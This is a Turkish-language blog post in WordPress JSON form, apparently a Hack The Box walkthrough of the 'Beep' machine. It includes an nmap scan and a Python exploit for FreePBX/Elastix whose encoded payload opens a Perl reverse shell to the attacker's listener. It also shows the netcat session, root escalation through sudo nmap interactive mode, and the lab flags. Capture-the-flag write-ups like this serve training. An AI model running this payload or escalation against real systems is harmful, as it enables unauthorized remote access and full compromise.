{"id":1657,"date":"2021-11-20T14:32:21","date_gmt":"2021-11-20T14:32:21","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1657"},"modified":"2021-11-20T14:32:21","modified_gmt":"2021-11-20T14:32:21","slug":"beep","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/11\/20\/beep\/","title":{"rendered":"Beep"},"content":{"rendered":"\n\n\n\n\n
Makine Ad\u0131<\/th>\nSeviye<\/th>\nOS<\/th>\nLogo<\/th>\n<\/tr>\n<\/thead>\n
Beep<\/a> - HTB<\/td>\nEasy<\/td>\nLinux<\/td>\n\"\"<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Walkthrough<\/h2>\n

nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n

\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# sleep 50; nmap -p- -A -T4 -Pn 10.10.10.7\nHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-11-20 04:57 EST\nStats: 0:02:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 93.75% done; ETC: 04:59 (0:00:06 remaining)\nStats: 0:05:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 87.12% done; ETC: 05:02 (0:00:07 remaining)\nStats: 0:05:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 89.39% done; ETC: 05:02 (0:00:07 remaining)\nStats: 0:05:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 90.91% done; ETC: 05:03 (0:00:08 remaining)\nStats: 0:06:05 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 93.94% done; ETC: 05:03 (0:00:06 remaining)\nStats: 0:06:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 94.70% done; ETC: 05:03 (0:00:06 remaining)\nStats: 0:06:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)\nStats: 0:06:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)\nNmap scan report for 10.10.10.7 (10.10.10.7)\nHost is up (0.093s latency).\nNot shown: 65519 closed ports\nPORT      STATE SERVICE    VERSION\n22\/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)\n| ssh-hostkey: \n|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)\n|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)\n25\/tcp    open  smtp       Postfix smtpd\n|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, \n80\/tcp    open  http       Apache httpd 2.2.3\n|_http-server-header: Apache\/2.2.3 (CentOS)\n|_http-title: Did not follow redirect to https:\/\/10.10.10.7\/\n110\/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\n|_pop3-capabilities: UIDL RESP-CODES USER EXPIRE(NEVER) TOP LOGIN-DELAY(0) PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) APOP AUTH-RESP-CODE STLS\n111\/tcp   open  rpcbind    2 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2            111\/tcp   rpcbind\n|   100000  2            111\/udp   rpcbind\n|   100024  1            875\/udp   status\n|_  100024  1            878\/tcp   status\n143\/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\n|_imap-capabilities: CATENATE IDLE Completed ACL OK CHILDREN ID ATOMIC URLAUTHA0001 NO X-NETSCAPE THREAD=REFERENCES RIGHTS=kxte LIST-SUBSCRIBED LISTEXT CONDSTORE UNSELECT RENAME MAILBOX-REFERRALS ANNOTATEMORE IMAP4 MULTIAPPEND QUOTA NAMESPACE THREAD=ORDEREDSUBJECT BINARY SORT=MODSEQ SORT IMAP4rev1 STARTTLS LITERAL+ UIDPLUS\n443\/tcp   open  ssl\/https?\n| ssl-cert: Subject: commonName=localhost.localdomain\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\n| Not valid before: 2017-04-07T08:22:08\n|_Not valid after:  2018-04-07T08:22:08\n|_ssl-date: 2021-11-20T11:01:40+00:00; +59m59s from scanner time.\n878\/tcp   open  status     1 (RPC #100024)\n993\/tcp   open  ssl\/imap   Cyrus imapd\n|_imap-capabilities: CAPABILITY\n995\/tcp   open  pop3       Cyrus pop3d\n3306\/tcp  open  mysql      MySQL (unauthorized)\n|_ssl-cert: ERROR: Script execution failed (use -d to debug)\n|_ssl-date: ERROR: Script execution failed (use -d to debug)\n|_sslv2: ERROR: Script execution failed (use -d to debug)\n|_tls-alpn: ERROR: Script execution failed (use -d to debug)\n|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)\n4190\/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w\/cyrus imap)\n4445\/tcp  open  upnotifyp?\n4559\/tcp  open  hylafax    HylaFAX 4.3.10\n5038\/tcp  open  asterisk   Asterisk Call Manager 1.1\n10000\/tcp open  http       MiniServ 1.570 (Webmin httpd)\n|_http-title: Site doesn't have a title (text\/html; Charset=iso-8859-1).\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=11\/20%OT=22%CT=1%CU=38827%PV=Y%DS=2%DC=T%G=Y%TM=6198C8\nOS:3F%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=CC%TI=Z%CI=Z%II=I%TS=A)OPS(\nOS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11\nOS:NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(\nOS:R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS\nOS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0\nOS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z\nOS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y\nOS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI\nOS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 2 hops\nService Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix\n\nHost script results:\n|_clock-skew: 59m58s\n\nTRACEROUTE (using port 554\/tcp)\nHOP RTT      ADDRESS\n1   68.64 ms 10.10.14.1 (10.10.14.1)\n2   68.77 ms 10.10.10.7 (10.10.10.7)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 463.84 seconds<\/code><\/pre>\n
Ger\u00e7ekten \u00e7ok fazla port a\u00e7\u0131k ve bu can\u0131m\u0131 s\u0131km\u0131\u015ft\u0131. 80 ile ba\u015flad\u0131m ve elde etti\u011fim versiyon bilgilerini ara\u015ft\u0131r\u0131yordum. https:\/\/10.10.10.7\/admin\/config.php<\/a><\/strong> adresinde FreePBX 2.8.1.4 on 10.10.10.7<\/strong> bilgisini elde ettim ve bununla ilgili aramalar yapmaya ba\u015flad\u0131m. https:\/\/raw.githubusercontent.com\/infosecjunky\/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution\/master\/exploit.py<\/a><\/strong> adresinde bir exploit vard\u0131 ancak \u00e7al\u0131\u015ft\u0131ramad\u0131m. SSL hatas\u0131 ile kar\u015f\u0131la\u015ft\u0131m ve \u00e7\u00f6zmek i\u00e7in u\u011fra\u015famad\u0131m. Kendim python3'e \u00e7evirmeye karar verdim. Bue snada url'yi direkt olarak bana \u00f6nd\u00fcrecek \u015fekilde kolay yolu se\u00e7tim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/10.10.10.7\/exp]\n\u2514\u2500# cat test.py \nimport requests\n\nrhost="10.10.10.7"\nlhost="10.10.14.6"\nlport=4444\nextension="233"\n\nurl = 'https:\/\/'+str(rhost)+'\/recordings\/misc\/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal\/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'\n\nprint(url)\n#requests.get(url, verify=False)<\/code><\/pre>\n
\u015eimdi bunu \u00e7al\u0131\u015ft\u0131ral\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/10.10.10.7\/exp]\n\u2514\u2500# python3 test.py \nhttps:\/\/10.10.10.7\/recordings\/misc\/callme_page.php?action=c&callmenum=233@from-internal\/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.6%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A<\/code><\/pre>\n
Adresi ald\u0131m taray\u0131c\u0131ya ekledim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# nc -lvp 4444                                                                          1 \u2a2f\nlistening on [any] 4444 ...\nconnect to [10.10.14.6] from beep.localdomain [10.10.10.7] 60262\nid\nuid=100(asterisk) gid=101(asterisk)\nwhich python\n\/usr\/bin\/python\npython -c 'import pty; pty.spawn("\/bin\/bash")'\nbash-3.2$ pwd\npwd\n\/tmp\nbash-3.2$ cd \/home\ncd \/home\nbash-3.2$ alias ls="ls -al"\nalias ls="ls -al"\nbash-3.2$ ls\nls\ntotal 28\ndrwxr-xr-x  4 root       root       4096 Apr  7  2017 .\ndrwxr-xr-x 22 root       root       4096 Nov 20 12:55 ..\ndrwxrwxr-x  2 fanis      fanis      4096 Apr  7  2017 fanis\ndrwx------  2 spamfilter spamfilter 4096 Apr  7  2017 spamfilter\nbash-3.2$ cd fanis\ncd fanis\nbash-3.2$ ls\nls\ntotal 32\ndrwxrwxr-x 2 fanis fanis 4096 Apr  7  2017 .\ndrwxr-xr-x 4 root  root  4096 Apr  7  2017 ..\n-rw------- 1 fanis fanis  114 Apr  7  2017 .bash_history\n-rw-r--r-- 1 fanis fanis   33 Apr  7  2017 .bash_logout\n-rw-r--r-- 1 fanis fanis  176 Apr  7  2017 .bash_profile\n-rw-r--r-- 1 fanis fanis  124 Apr  7  2017 .bashrc\n-rw-rw-r-- 1 fanis fanis   33 Nov 20 12:55 user.txt\nbash-3.2$ cat user.txt\ncat user.txt\nc923eee6a96abd8008a69532fcd6840d\n<\/code><\/pre>\n
root olmakta kolayd\u0131.<\/p>\n
\nbash-3.2$ sudo -l\nsudo -l\nMatching Defaults entries for asterisk on this host:\n    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR\n    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE\n    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC\n    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET\n    XAUTHORITY"\n\nUser asterisk may run the following commands on this host:\n    (root) NOPASSWD: \/sbin\/shutdown\n    (root) NOPASSWD: \/usr\/bin\/nmap\n    (root) NOPASSWD: \/usr\/bin\/yum\n    (root) NOPASSWD: \/bin\/touch\n    (root) NOPASSWD: \/bin\/chmod\n    (root) NOPASSWD: \/bin\/chown\n    (root) NOPASSWD: \/sbin\/service\n    (root) NOPASSWD: \/sbin\/init\n    (root) NOPASSWD: \/usr\/sbin\/postmap\n    (root) NOPASSWD: \/usr\/sbin\/postfix\n    (root) NOPASSWD: \/usr\/sbin\/saslpasswd2\n    (root) NOPASSWD: \/usr\/sbin\/hardware_detector\n    (root) NOPASSWD: \/sbin\/chkconfig\n    (root) NOPASSWD: \/usr\/sbin\/elastix-helper\nbash-3.2$ \n\nbash-3.2$ \n\nbash-3.2$ sudo -u root \/usr\/bin\/nmap --interactive\nsudo -u root \/usr\/bin\/nmap --interactive\n\nStarting Nmap V. 4.11 ( http:\/\/www.insecure.org\/nmap\/ )\nWelcome to Interactive Mode -- press h <enter> for help\nnmap> !sh\n!sh\nsh-3.2# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\nsh-3.2# cd \/root\ncd \/root\nsh-3.2# ls\nls\nanaconda-ks.cfg            install.log.syslog  webmin-1.570-1.noarch.rpm\nelastix-pr-2.2-1.i386.rpm  postnochroot\ninstall.log                root.txt\nsh-3.2# cat root.txt\ncat root.txt\n97b794de414bb98f984d69a8998c4287<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Makine Ad\u0131 Seviye OS Logo Beep – HTB Easy Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. \u2500\u2500(root💀kali)-[~] \u2514\u2500# sleep 50; nmap -p- -A -T4 -Pn 10.10.10.7…<\/p>\n
Devam\u0131n\u0131 okuBeep<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1657","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1657","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1657"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1657\/revisions"}],"predecessor-version":[{"id":1658,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1657\/revisions\/1658"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1657"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1657"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1657"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}